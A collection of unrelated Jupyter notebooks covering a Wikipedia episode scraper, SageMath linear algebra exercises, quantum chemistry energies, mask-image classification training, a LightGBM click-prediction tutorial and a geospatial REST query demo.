# * There are a bunch of iterative tools in Python--we used `apply` to iterate through GeoDataFrame rows (geometries) using axis=1 (we could also iterate through columns using axis=0). Some other important iterative tools that we didn't discuss are [loops](https://www.digitalocean.com/community/tutorials/how-to-construct-for-loops-in-python-3) and [list comprehensions](https://www.datacamp.com/community/tutorials/python-list-comprehension).
# * Data Structures in Python come in [many shapes and sizes](https://pandas.pydata.org/pandas-docs/stable/dsintro.html). Arrange your data (whatever it may be) in the structure of your choosing by 1) reading the filepath into the desired library like GeoPandas or, 2) using your data as an argument in a Data Constructor.
|
copy notebooks/Copy of Intro_Python_geospatial.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import os
import re
import json
import pandas as pd
# -
WIKI_URL = r"https://en.wikipedia.org/wiki/List_of_MythBusters_episodes"
FILENAME = os.path.abspath(os.path.join(os.path.dirname(__name__), "mythbusters.json"))
def get_season(season_table, index):
season = season_table.loc[index]["Season"].values[1]
return f"{season} season"
def normalize(name):
name = name.lower()
name = name.replace(" / ", " ").replace("/", " ").replace(" - ", "-")
name = re.sub(r"[^-\w\s]", "", name)
name = name.replace(" ", "-")
return name
def process_table(df, season):
episodes = []
for index, row in df[::2].iterrows():
for name in re.findall(r"\"(.+?)\"", row["Title"]):
episodes.append(
{
"name": normalize(name),
"episode": row["No. in season"],
"season": season,
}
)
return episodes
df = pd.read_html(WIKI_URL)
len(df)
results = []
for ind, table in enumerate(df):
if "Title" in table:
season = get_season(df[0], ind - 1)
episodes = process_table(table, season)
results.extend(episodes)
with open(FILENAME, "w") as f:
json.dump(results, f)
|
MythBusters.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: SageMath 9.0
# language: sage
# name: sagemath
# ---
# # Asignacion a Cargo del Docente (ACD)
#
# Este notebook servira para corroborar los ejercicios de la _Asignacion a Cargo del Docente_ del curso de _Álgera Lineal_ de la _UnADM_.
#
# El uso de este material, en actividades realcionadas con la _UnADM_, debe regirse por el [código de ética](https://www.unadmexico.mx/images/descargables/codigo_de_etica_de_estudiantes_de_la_unadm.pdf) de la institución. Para cualquier otro proposito favor de seguir los lineamientos expresados en el archivo [readme.md](../../../readme.md) de este repositorio repositorio.
# +
def show(matriz, norm=True, tex=False):
if norm:
print(matriz)
if tex:
print("\n--")
print(latex(matriz))
if norm or tex:
print("\n------\n")
def starrus(mat, py=False):
ret = ""; temp = ""
n = mat.nrows()
for i in range(n):
ret += ("({})*({})*({})".format(mat[i,0],
mat[(i+1)%n, 1],
mat[(i+2)%n, 2]))
temp += ("({})*({})*({})".format(mat[(i+2)%n,0],
mat[(i+1)%n, 1],
mat[(i)%n, 2]))
if i != n-1:
ret += " + "
temp += " + "
ret += "-("
temp += ")"
if py:
return ret+temp
return (ret+temp).replace("*", "")
def extendidaStarrus(mat):
n = mat.nrows()
return latex(Matrix([mat[i%n] for i in range(n+2)]))
def gauss_method(M,rescale_leading_entry=False):
num_rows=M.nrows()
num_cols=M.ncols()
show(M, tex=tex)
col = 0 # all cols before this are already done
for row in range(0,num_rows):
# ?Need to swap in a nonzero entry from below
while (col < num_cols
and M[row][col] == 0):
for i in M.nonzero_positions_in_column(col):
if i > row:
print(" intercambiamos la fila",row+1," con la fila",i+1)
M.swap_rows(row,i)
show(M, tex=tex)
break
else:
col += 1
if col >= num_cols:
break
# Now guaranteed M[row][col] != 0
if (rescale_leading_entry and M[row][col] != 1):
print(" multiplicamos ",1/M[row][col]," veces la fila ",row+1)
M.rescale_row(row,1/M[row][col])
show(M, tex=tex)
change_flag=False
for changed_row in range(row+1,num_rows):
if M[changed_row][col] != 0:
change_flag=True
factor=-1*M[changed_row][col]/M[row][col]
print(" hacemos que la fila", changed_row+1,
"sea",factor,
"veces la fila",row+1,
"mas la fila",changed_row+1)
M.add_multiple_of_row(changed_row,row,factor)
if change_flag:
show(M, tex=tex)
col +=1
# -
# ### Ejercicio 1
#
# Obtener el determinante de la matriz A por el _método de Cramer_
# $$
# A = \begin{pmatrix}
# 3 & 2 & 1 \\
# 4 &-2 & 2 \\
# 2 & 3 & 1
# \end{pmatrix}
# $$
# +
tex = False
A = Matrix(QQ, [[3,2,1],
[4,-2,2],
[2,3,1]])
show(A, tex=tex)
# -
#print(extendidaStarrus(A))
print(starrus(A))
print((3)*(-2)*(1) + (4)*(3)*(1) + (2)*(2)*(2) -((2)*(-2)*(1) + (3)*(3)*(2) + (4)*(2)*(1)))
# ## Ejercicio 2
# Resuelve $A + B$ para las matrices
# $$
# A = \begin{pmatrix}
# 3 & 4 & 1 \\ 5 & 3 & 1 \\ 2 & 3 & 1
# \end{pmatrix},
# B = \begin{pmatrix}
# -2 & -3 & -1 \\ 4 & 3 & 2 \\ 10 & 4 & 2
# \end{pmatrix}
# $$
# +
A = Matrix(QQ, [[3,4,1],[5,3,1],[2,3,1]])
B = Matrix(QQ, [[-2,-3,-1],[4,3,2],[10,4,2]])
show(A, tex=tex)
show(B, tex=tex)
# -
show(A + B, tex=tex)
# ## Ejercicio 3
# Resolver el siguiente sistema de ecuaciones mediante el __metodo de Gauss__
#
# $$
# \begin{eqnarray*}
# 3x + 2y + 2z &=& 10 \\
# 2x + 3y + z &=& 8 \\
# 3x + y + 5z &=& 11
# \end{eqnarray*}
# $$
# +
eq = Matrix(QQ, [[3,2,2,10],[2,3,1,8],[3,1,5,11]])
gauss_method(eq)
print(eq[:,:3]**(-1)*eq[:,3])
# -
|
B1-1/BALI/Actividades/BALI_Z_BERC.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
pip install plotly==4.5.0
import numpy as np
import plotly.graph_objects as go
import matplotlib.pyplot as plt
fig = go.Figure(data=[go.Table(
header=dict(values=['Theory Level', 'Total Energy (a.u.)', 'Total Energy (kJ/mol)'],
fill_color='cornsilk'),
cells=dict(values=[['HF/STO-3G', 'HF/3-21G*', 'HF/6-31G**', 'B3LYP/3-21G*','B3LYP/6-31G**','B3LYP/DGDZVP'], [-39.7268636588, -39.9768775238, -40.2017045054, -40.3015924400, -40.5240140496,-40.5233611883], [-104302.888481552,-104959.299934112,-105549.583219269,-105811.839011538,-106395.806992028,-106394.092904554]], fill_color='azure'))])
fig.show()
# +
HF_Basis=('STO-3G','3-21G*','6-31G**')
HF_times=(9.1, 15.3, 15.7)
B3LYP_Basis=('3-21G*','6-31G**','DGDZVP')
B3LYP_times=(25.0, 33.6, 27.6)
fig, (ax1, ax2)= plt.subplots(1,2, figsize=(15,5))
ax1.bar(HF_Basis, HF_times, color='darkslateblue')
ax1.set_title('HF')
ax1.set_ylabel('CPU Time (s)')
ax1.set_ylim((0,35))
ax2.bar(B3LYP_Basis,B3LYP_times, color='mediumaquamarine')
ax2.set_ylabel('CPU Time (s)')
ax2.set_title('B3LYP')
# -
|
W3/Nida_HW3.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.8.5 64-bit (''base'': conda)'
# name: python3
# ---
# +
import csv
import glob
import pandas as pd
import numpy as np
import PIL
import cv2
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import Dataset
from torch.utils.data.dataloader import DataLoader
import timm
import albumentations as A
from albumentations.pytorch import ToTensorV2
from sklearn.model_selection import train_test_split
from tqdm import tqdm
import copy
import os
import wandb
import time
# -
# # 1. 데이터 로드
train_dir = '../../input/data/train'
test_dir = '../../input/data/eval'
save_dir = '../saved/models/'
# ### 하이퍼파라미터
# +
#model_name = 'efficientnet_b1'
model_name = 'vit_base_patch16_384'
learning_rate = 2e-5
batch_size = 16
step_size = 5
epochs = 15
earlystop = 5
A_transform = {
'train':
A.Compose([
A.Resize(512, 512),
A.RandomCrop(384, 384),
# A.Resize(224, 224),
A.HorizontalFlip(p=0.5),
A.Cutout(num_holes=8, max_h_size=32,max_w_size=32),
A.ElasticTransform(),
A.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
ToTensorV2()
]),
'valid':
A.Compose([
A.Resize(384, 384),
# A.Resize(224, 224),
A.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
ToTensorV2()
]),
'test':
A.Compose([
A.Resize(384, 384),
# A.Resize(224, 224),
A.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
ToTensorV2()
])
}
# +
class LoadCSV():
def __init__(self, dir):
self.dir = dir
self.img_dir =train_dir + '/new_images/'
self.origin_csv_path = train_dir + '/train.csv'
self.trans_csv_path = train_dir + '/trans_train.csv'
if not os.path.exists(self.trans_csv_path):
self._makeCSV()
self.df = pd.read_csv(self.trans_csv_path)
#self.df = self.df[:200]
def _makeCSV(self):
with open(self.trans_csv_path, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(["path", "label"])
df = pd.read_csv(self.origin_csv_path)
for idx in range(len(df)):
data = df.iloc[idx]
img_path_base = os.path.join(os.path.join(self.img_dir, data['path']), '*')
for img_path in glob.glob(img_path_base):
label = 0
if "incorrect" in img_path:
label+=6
elif 'normal' in img_path:
label+=12
elif data['gender']=='female':
label+=3
elif data['age'] >= 30 and data['age'] < 60:
label+=1
elif data['age'] >= 60:
label+=2
writer.writerow([img_path, label])
f.close()
class MaskDataset(Dataset):
def __init__(self, dataframe, transform=None):
super().__init__()
self.df = dataframe
self.transform = transform
def __len__(self):
return len(self.df)
def __getitem__(self, idx):
class_id = torch.tensor(self.df['label'].iloc[idx])
img = PIL.Image.open(self.df['path'].iloc[idx])
img = np.array(img.convert("RGB"))
if self.transform:
img = self.transform(image=img)['image']
return img, class_id
# -
# # 2. 모델 설계
#
class MyModel(nn.Module):
def __init__(self, model_name, num_classes):
super(MyModel, self).__init__()
self.num_classes = num_classes
self.model = timm.create_model(model_name, pretrained=True)
# n_features = self.model.classifier.in_features
# self.model.classifier = torch.nn.Linear(in_features=n_features, out_features=num_classes, bias=True)
# torch.nn.init.xavier_uniform_(self.model.classifier.weight)
# stdv = 1/np.sqrt(self.num_classes)
# self.model.classifier.bias.data.uniform_(-stdv, stdv)
n_features = self.model.head.in_features
self.model.head = torch.nn.Linear(in_features=n_features, out_features=self.num_classes, bias=True)
torch.nn.init.xavier_uniform_(self.model.head.weight)
stdv = 1/np.sqrt(self.num_classes)
self.model.head.bias.data.uniform_(-stdv, stdv)
def forward(self, x):
return self.model(x)
# +
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), learning_rate)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=50, eta_min=0)
# -
# # 3. 학습
today = time.strftime('%Y%m%d_%H%M%S', time.localtime(time.time()))
if not os.path.exists(save_dir + today):
os.makedirs(save_dir + today)
# +
from sklearn.model_selection import StratifiedKFold
mask_csv = LoadCSV(train_dir)
kfold = StratifiedKFold(n_splits=5, shuffle=False)
for fold, (train_idx, valid_idx) in enumerate(kfold.split(mask_csv.df['path'], mask_csv.df['label'])):
print(f'FOLD {fold}')
mask_train = MaskDataset(mask_csv.df, transform=A_transform['train'])
train_subsampler = torch.utils.data.SubsetRandomSampler(train_idx)
valid_subsampler = torch.utils.data.SubsetRandomSampler(valid_idx)
train_loader = DataLoader(mask_train, batch_size=batch_size, sampler=train_subsampler, drop_last=False, num_workers=8, pin_memory=True)
valid_loader = DataLoader(mask_train, batch_size=batch_size, sampler=valid_subsampler, drop_last=False, num_workers=8, pin_memory=True)
dataloaders = {'train': train_loader, 'valid':valid_loader}
model = MyModel(model_name, 18).to(device)
earlystop_value = 0
best_acc = 0
best_loss = 999999999
best_model = copy.deepcopy(model.state_dict())
for epoch in range(epochs):
if earlystop_value >= earlystop:
break
train_loss, valid_loss, train_acc_list, valid_acc_list = 0, 0, [],[]
for phase in ['train', 'valid']:
if phase == 'train':
model.train()
else:
model.eval()
running_loss = 0.0
running_corrects = 0
with tqdm(dataloaders[phase], total=dataloaders[phase].__len__(), unit="batch") as train_bar:
for inputs, labels in train_bar:
train_bar.set_description(f"{phase} Epoch {epoch} ")
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
outputs = model(inputs)
loss = criterion(outputs, labels)
if phase == 'train':
loss.backward()
optimizer.step()
outputs = outputs.cpu().detach().numpy()
labels = labels.cpu().detach().numpy()
running_loss += loss.item() * inputs.size(0)
running_corrects += (np.argmax(outputs, axis=1)== labels).mean()
epoch_loss = running_loss / len(dataloaders[phase].dataset)
epoch_acc = running_corrects / len(dataloaders[phase].dataset)
train_bar.set_postfix(loss=epoch_loss, acc=epoch_acc)
lr_scheduler.step()
if phase=='valid':
if epoch_loss < best_loss:
best_loss = epoch_loss
best_model_wts = copy.deepcopy(model.state_dict())
torch.save(best_model_wts, f'{save_dir}{today}/baseline_{model_name}_lr{learning_rate}_stepLR{step_size}_batch{batch_size}_kfold{fold}_epoch{epoch}_valid_loss_{epoch_loss:.5f}.pt')
earlystop_value = 0
else:
earlystop_value += 1
# -
# # 4. 추론
class TestDataset(Dataset):
def __init__(self, img_paths, transform):
self.img_paths = img_paths
self.transform = transform
def __getitem__(self, index):
image = PIL.Image.open(self.img_paths[index])
image = np.array(image.convert("RGB"))
if self.transform:
image = self.transform(image=image)
image = image['image']
return image
def __len__(self):
return len(self.img_paths)
# +
submission = pd.read_csv(os.path.join(test_dir, 'info.csv'))
image_dir = os.path.join(test_dir, 'new_images')
image_paths = [os.path.join(image_dir, img_id) for img_id in submission.ImageID]
dataset = TestDataset(image_paths, A_transform['test'])
test_loader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
model.eval()
all_predictions = []
with tqdm(test_loader, total=test_loader.__len__(), unit="batch") as test_bar:
for images in test_bar:
with torch.no_grad():
images = images.to(device)
pred = model(images)
pred = pred.argmax(dim=-1)
all_predictions.extend(pred.cpu().numpy())
submission['ans'] = all_predictions
submission.to_csv(os.path.join(test_dir, 'submission.csv'), index=False)
print('test inference is done!')
# +
import numpy as np
import torch.nn.functional as F
model_num1=MyModel('efficientnet_b3', 18).to(device)
model_num1.load_state_dict(torch.load('/opt/ml/image-classification-level1-04/saved/models/PretrainModelTimm_NoOversampling_Cutout_Elastic_CLAHE_Cutmix_Transform_input_224/0831_204359/model_best.pth')['state_dict'])
model_num2 = MyModel(model_name, 18).to(device)
model_num2.load_state_dict(torch.load('saved/models/20210901_022127/baseline_efficientnet_b1_lr1e-05_stepLR5_kfoldStratifiedKFold(n_splits=5, random_state=None, shuffle=False)_batch16_epoch1_valid_loss_0.46484.pt'))
submission = pd.read_csv(os.path.join(test_dir, 'info.csv'))
image_dir = os.path.join(test_dir, 'images')
image_paths = [os.path.join(image_dir, img_id) for img_id in submission.ImageID]
dataset = TestDataset(image_paths[:200], A_transform['test'])
test_loader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
best_models=[model_num1,model_num2]
prediction_array=np.zeros((12600,18))
ratio=[0.6,0.4]
for i,model in enumerate(best_models):
idx=0
with tqdm(test_loader, total=test_loader.__len__(), unit="batch") as test_bar:
for images in test_bar:
with torch.no_grad():
predictions_list = []
images = images.to(device)
pred = model(images)
pred=F.softmax(pred,dim=-1)
pred=pred*ratio[i]
#pred = pred.argmax(dim=-1)
pred = pred.tolist()
batch_idx = batch_size * idx
#print('pred',pred)
# images.shape[0] 는 64. 즉, 배치 만큼만 채워 넣는다.
if (idx+1) == len(test_loader):
prediction_array[batch_idx:batch_idx + 8,:] = pred
predictions_list.append(prediction_array[...,np.newaxis])
else :
prediction_array[batch_idx: batch_idx + 16, :] = pred
predictions_list.append(prediction_array[..., np.newaxis])
idx+=1
print(predictions_list[-1][-16:])
# for i in range(200):
# print(predictions_list[-1][i])
# axis = 2를 기준으로 평균
#predictions_array = np.concatenate(predictions_list, axis = 1)
#predictions_mean = predictions_array.sum(axis = 1)
# 평균 값이 0.5보다 클 경우 1 작으면 0
#print(predictions_mean)
|
jupyter/baseline kfold.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python (reco_bare)
# language: python
# name: reco_bare
# ---
# <i>Copyright (c) Microsoft Corporation. All rights reserved.</i>
#
# <i>Licensed under the MIT License.</i>
# # LightGBM: A Highly Efficient Gradient Boosting Decision Tree
# This notebook will give you an example of how to train a LightGBM model to estimate click-through rates on an e-commerce advertisement. We will train a LightGBM based model on the Criteo dataset.
#
# LightGBM \[1\] is a gradient boosting framework that uses tree-based learning algorithms. It is designed to be distributed and efficient with the following advantages:
# * Fast training speed and high efficiency.
# * Low memory usage.
# * Great accuracy.
# * Support of parallel and GPU learning.
# * Capable of handling large-scale data.
# ## Global Settings and Imports
# +
import sys, os
sys.path.append("../../")
import lightgbm as lgb
import papermill as pm
import pandas as pd
import category_encoders as ce
from tempfile import TemporaryDirectory
import reco_utils.recommender.lightgbm.lightgbm_utils as lgb_utils
import reco_utils.dataset.criteo as criteo
print("System version: {}".format(sys.version))
print("LightGBM version: {}".format(lgb.__version__))
# -
# ### Parameter Setting
# Let's set the main related parameters for LightGBM now. Basically, the task is a binary classification (predicting click or no click), so the objective function is set to binary logloss, and 'AUC' metric, is used as a metric which is less effected by imbalance in the classes of the dataset.
#
# Generally, we can adjust the number of leaves (MAX_LEAF), the minimum number of data in each leaf (MIN_DATA), maximum number of trees (NUM_OF_TREES), the learning rate of trees (TREE_LEARNING_RATE) and EARLY_STOPPING_ROUNDS (to avoid overfitting) in the model to get better performance.
#
# Besides, we can also adjust some other listed parameters in the following to optimize the results, which are shown in [5] concretely.
# + tags=["parameters"]
MAX_LEAF = 64
MIN_DATA = 20
NUM_OF_TREES = 100
TREE_LEARNING_RATE = 0.15
EARLY_STOPPING_ROUNDS = 20
METRIC = "auc"
SIZE = "sample"
# -
params = {
'task': 'train',
'boosting_type': 'gbdt',
'num_class': 1,
'objective': "binary",
'metric': METRIC,
'num_leaves': MAX_LEAF,
'min_data': MIN_DATA,
'boost_from_average': True,
#set it according to your cpu cores.
'num_threads': 20,
'feature_fraction': 0.8,
'learning_rate': TREE_LEARNING_RATE,
}
# ## Data Preparation
# Here we use CSV format as the example data input. Our example data is a sample (about 100 thousand samples) from Criteo dataset [2]. The Criteo dataset is a well-known industry benchmarking dataset for developing CTR prediction models, and it's frequently adopted as evaluation dataset by research papers. The original dataset is too large for a lightweight demo, so we sample a small portion from it as a demo dataset. <br>
# Specifically, there are 39 columns of features in Criteo, where 13 columns are numerical features (I1-I13) and the other 26 columns are categorical features (C1-C26).
# +
nume_cols = ["I" + str(i) for i in range(1, 14)]
cate_cols = ["C" + str(i) for i in range(1, 27)]
label_col = "Label"
header = [label_col] + nume_cols + cate_cols
with TemporaryDirectory() as tmp:
all_data = criteo.load_pandas_df(size=SIZE, local_cache_path=tmp, header=header)
display(all_data.head())
# -
# First, we cut three sets (train_data (first 80%), valid_data (middle 10%) and test_data (last 10%)), cut from the original all data. <br>
# Notably, considering the Criteo is a kind of time-series streaming data, which is also very common in recommendation scenario, we split the data by its order.
# split data to 3 sets
length = len(all_data)
train_data = all_data.loc[:0.8*length-1]
valid_data = all_data.loc[0.8*length:0.9*length-1]
test_data = all_data.loc[0.9*length:]
# ## Basic Usage
# ### Ordinal Encoding
# Considering LightGBM could handle the low-frequency features and missing value by itself, for basic usage, we only encode the string-like categorical features by an ordinal encoder.
# +
ord_encoder = ce.ordinal.OrdinalEncoder(cols=cate_cols)
def encode_csv(df, encoder, label_col, typ='fit'):
if typ == 'fit':
df = encoder.fit_transform(df)
else:
df = encoder.transform(df)
y = df[label_col].values
del df[label_col]
return df, y
train_x, train_y = encode_csv(train_data, ord_encoder, label_col)
valid_x, valid_y = encode_csv(valid_data, ord_encoder, label_col, 'transform')
test_x, test_y = encode_csv(test_data, ord_encoder, label_col, 'transform')
print('Train Data Shape: X: {trn_x_shape}; Y: {trn_y_shape}.\nValid Data Shape: X: {vld_x_shape}; Y: {vld_y_shape}.\nTest Data Shape: X: {tst_x_shape}; Y: {tst_y_shape}.\n'
.format(trn_x_shape=train_x.shape,
trn_y_shape=train_y.shape,
vld_x_shape=valid_x.shape,
vld_y_shape=valid_y.shape,
tst_x_shape=test_x.shape,
tst_y_shape=test_y.shape,))
# -
# ### Create model
# When both hyper-parameters and data are ready, we can create a model:
lgb_train = lgb.Dataset(train_x, train_y.reshape(-1), params=params, categorical_feature=cate_cols)
lgb_valid = lgb.Dataset(valid_x, valid_y.reshape(-1), reference=lgb_train, categorical_feature=cate_cols)
lgb_test = lgb.Dataset(test_x, test_y.reshape(-1), reference=lgb_train, categorical_feature=cate_cols)
lgb_model = lgb.train(params,
lgb_train,
num_boost_round=NUM_OF_TREES,
early_stopping_rounds=EARLY_STOPPING_ROUNDS,
valid_sets=lgb_valid,
categorical_feature=cate_cols)
# Now let's see what is the model's performance:
test_preds = lgb_model.predict(test_x)
res_basic = lgb_utils.cal_metric(test_y.reshape(-1), test_preds, ['auc','logloss'])
print(res_basic)
pm.record("res_basic", res_basic)
# <script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=default"></script>
# ## Optimized Usage
# ### Label-encoding and Binary-encoding
# Next, since LightGBM has a better capability in handling dense numerical features effectively, we try to convert all the categorical features in original data into numerical ones, by label-encoding [3] and binary-encoding [4]. Also due to the sequence property of Criteo, the label-encoding we adopted is executed one-by-one, which means we encode the samples in order, by the information of the previous samples before each sample (sequential label-encoding and sequential count-encoding). Besides, we also filter the low-frequency categorical features and fill the missing values by the mean of corresponding columns for the numerical features. (consulting `lgb_utils.NumEncoder`)
#
# Specifically, in `lgb_utils.NumEncoder`, the main steps are as follows.
# * Firstly, we convert the low-frequency categorical features to "LESS" and the missing categorical features to "UNK".
# * Secondly, we convert the missing numerical features into the mean of corresponding columns.
# * Thirdly, the string-like categorical features are ordinal encoded like the example shown in basic usage.
# * And then, we target encode the categorical features in the samples order one-by-one. For each sample, we add the label and count information of its former samples into the data and produce new features. Formally, for $i=1,2,...,n$, we add $\frac{\sum\nolimits_{j=1}^{i-1} I(x_j=c) \cdot y}{\sum\nolimits_{j=1}^{i-1} I(x_j=c)}$ as a new label feature for current sample $x_i$, where $c$ is a category to encode in current sample, so $(i-1)$ is the number of former samples, and $I(\cdot)$ is the indicator function that check the former samples contain $c$ (whether $x_j=c$) or not. At the meantime, we also add the count frequency of $c$, which is $\frac{\sum\nolimits_{j=1}^{i-1} I(x_j=c)}{i-1}$, as a new count feature.
# * Finally, based on the results of ordinal encoding, we add the binary encoding results as new columns into the data.
#
# Note that the statistics used in the above process only updates when fitting the training set, while maintaining static when transforming the testing set because the label of test data should be considered as unknown.
label_col = 'Label'
num_encoder = lgb_utils.NumEncoder(cate_cols, nume_cols, label_col)
train_x, train_y = num_encoder.fit_transform(train_data)
valid_x, valid_y = num_encoder.transform(valid_data)
test_x, test_y = num_encoder.transform(test_data)
del num_encoder
print('Train Data Shape: X: {trn_x_shape}; Y: {trn_y_shape}.\nValid Data Shape: X: {vld_x_shape}; Y: {vld_y_shape}.\nTest Data Shape: X: {tst_x_shape}; Y: {tst_y_shape}.\n'
.format(trn_x_shape=train_x.shape,
trn_y_shape=train_y.shape,
vld_x_shape=valid_x.shape,
vld_y_shape=valid_y.shape,
tst_x_shape=test_x.shape,
tst_y_shape=test_y.shape,))
# ### Training and Evaluation
lgb_train = lgb.Dataset(train_x, train_y.reshape(-1), params=params)
lgb_valid = lgb.Dataset(valid_x, valid_y.reshape(-1), reference=lgb_train)
lgb_model = lgb.train(params,
lgb_train,
num_boost_round=NUM_OF_TREES,
early_stopping_rounds=EARLY_STOPPING_ROUNDS,
valid_sets=lgb_valid)
test_preds = lgb_model.predict(test_x)
res_optim = lgb_utils.cal_metric(test_y.reshape(-1), test_preds, ['auc','logloss'])
print(res_optim)
pm.record("res_optim", res_optim)
# ## Model saving and loading
# Now we finish the basic training and testing for LightGBM, next let's try to save and reload the model, and then evaluate it again.
# +
with TemporaryDirectory() as tmp:
save_file = os.path.join(tmp, r'finished.model')
lgb_model.save_model(save_file)
loaded_model = lgb.Booster(model_file=save_file)
# eval the performance again
test_preds = loaded_model.predict(test_x)
print(lgb_utils.cal_metric(test_y.reshape(-1), test_preds, ['auc','logloss']))
# -
# ## Reference
# \[1\] <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, and <NAME>. 2017. LightGBM: A highly efficient gradient boosting decision tree. In Advances in Neural Information Processing Systems. 3146–3154.<br>
# \[2\] The Criteo datasets: http://labs.criteo.com/wp-content/uploads/2015/04/dac_sample.tar.gz .<br>
# \[3\] <NAME>, <NAME>, and <NAME>. 2018. CatBoost: gradient boosting with categorical features support. arXiv preprint arXiv:1810.11363 (2018).<br>
# \[4\] Scikit-learn. 2018. categorical_encoding. https://github.com/scikit-learn-contrib/categorical-encoding .<br>
# \[5\] The parameters of LightGBM: https://github.com/Microsoft/LightGBM/blob/master/docs/Parameters.rst .
|
notebooks/00_quick_start/lightgbm_tinycriteo.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Import libraries, define const values, and set URLs path
# Set the root address (REST_API_ADDRESS) based on your docker exposed ID
# +
import json
import folium
from geopandas import GeoDataFrame
from pysal.viz.mapclassify import Natural_Breaks
import requests
id_field = 'id'
value_field = 'score'
num_bins = 4
fill_color = 'YlOrRd'
fill_opacity = 0.9
# REST URL
REST_API_ADDRESS = 'http://localhost:4646/'
Alive_URL = REST_API_ADDRESS + 'alive'
BRS_URL = REST_API_ADDRESS + 'BRS'
RemoveTables_URL=REST_API_ADDRESS + 'removeTables'
Flush_URL = REST_API_ADDRESS + 'flushBuffer'
ChangeProteus_URL = REST_API_ADDRESS + 'changeProteus'
ChangeAlgo_URL = REST_API_ADDRESS + 'changeAlgo'
ChangeMemorySize_URL = REST_API_ADDRESS + 'changeMemorySize'
# -
# ## Check BRS is alive
# Check the status of BRS
response = requests.get(Alive_URL)
print(response.text)
# ## Set Proteus credential
# Set the proteus credentials. BRS needs this information to fetch tables.
ProteusURL=""
ProteusUsername=""
ProteusPassword=""
data={'url' : ProteusURL, 'username' : ProteusUsername, 'pass':ProteusPassword}
response = requests.get(ChangeProteus_URL,params=data)
print(response.text)
# ## Change algorithm
# Change algorithm to unif, single, multi, and hybrid. The fastest is the hybrid, and unif is an uniform grid. Default is hybrid.
algo="hybrid"
data={'algo':algo}
response = requests.get(ChangeAlgo_URL,params=data)
print(response.text)
# ## Remove previous results
# BRS buffers previous results to avoid repeating the same query. To remove buffered results
response = requests.get(Flush_URL)
print(response.text)
# ## Change memory size
# Indicate the size of RAM for the spark instance. Default is 10G.
memorySize=11
data={'memorySize':memorySize}
response = requests.get(ChangeMemorySize_URL,params=data)
print(response.text)
# ## Identify industrial districts
# An example of a BRS query. The table must include columns lat and lon which are coordinates. The f indicate the column name (revenue, numberOfEmployees, etc) for the scoring function. Keywords are used to apply filter on the records. You can define two columns for filtering at the same time. Separate keywords with comma. For examle, if you need to filter companies with ATECO code of 10.10 or 10.11, set keywordsColumn to "ATECO" and keywords to "10.10,10.11". Moreover, at the same query, if you want to filter companies of a specific province (e,g,. pisa), set keywordsColumn2 to "province" and set keywords2 to "pisa".
#
# This query detects top 5 regions sized 10km*10km that contain the most number (f is null) of startup companies( filter column flags with startup-registroimprese). The second keywordColumn2 is set empty.
#
# CAUTION: You can run this query with a pre-fetched table (BRSflags which is been injected into the docker image) in order to check the REST API and results.
# +
table = "BRSflags" # This table already exists in the docker image
topk = 10 #
eps = .1 # We measure distance in radians, where 1 radian is around 100km, and epsilon is the length of each side of the region
f = "null" # Set f to null if the scoring fucntion is number of elements
dist = True
keywordsColumn = "flags"
keywords = "startup-registroimprese"
keywordsColumn2 = ""
keywords2 = ""
data = {'topk' : topk, 'eps' : eps, 'f' : f, 'input' : table, "keywordsColumn" : keywordsColumn, "keywords" : keywords,"keywordsColumn2":keywordsColumn2,"keywords2":keywords2,"dist":dist}
response = requests.get(BRS_URL, params=data)
print(response.text)
# -
# ## Initialize the map and visualize the output regions
# This code helps you to visualize the output of previous cell
res = json.loads(response.text)
results_geojson={"type":"FeatureCollection","features":[]}
for region in res:
results_geojson['features'].append({"type": "Feature", "geometry": { "type": "Point", "coordinates": region['center']},
"properties": {
"id": region['rank'],
"score": region['score']
}})
m = folium.Map(
location=[45.474989560000004,9.205786594999998],
tiles='Stamen Toner',
zoom_start=11
)
gdf = GeoDataFrame.from_features(results_geojson['features'])
gdf.crs = {'init': 'epsg:4326'}
gdf['geometry'] = gdf.buffer(data['eps']).envelope
threshold_scale = Natural_Breaks(gdf[value_field], k=num_bins).bins.tolist()
threshold_scale.insert(0, gdf[value_field].min())
choropleth = folium.Choropleth(gdf, data=gdf, columns=[id_field, value_field],
key_on='feature.properties.{}'.format(id_field),
fill_color=fill_color, fill_opacity=fill_opacity,
threshold_scale=threshold_scale).add_to(m)
fields = list(gdf.columns.values)
fields.remove('geometry')
tooltip = folium.features.GeoJsonTooltip(fields=fields)
choropleth.geojson.add_child(tooltip)
m
# ## ---------------------------------------------------------------------------------------------------------
# ## Identify industrial districts
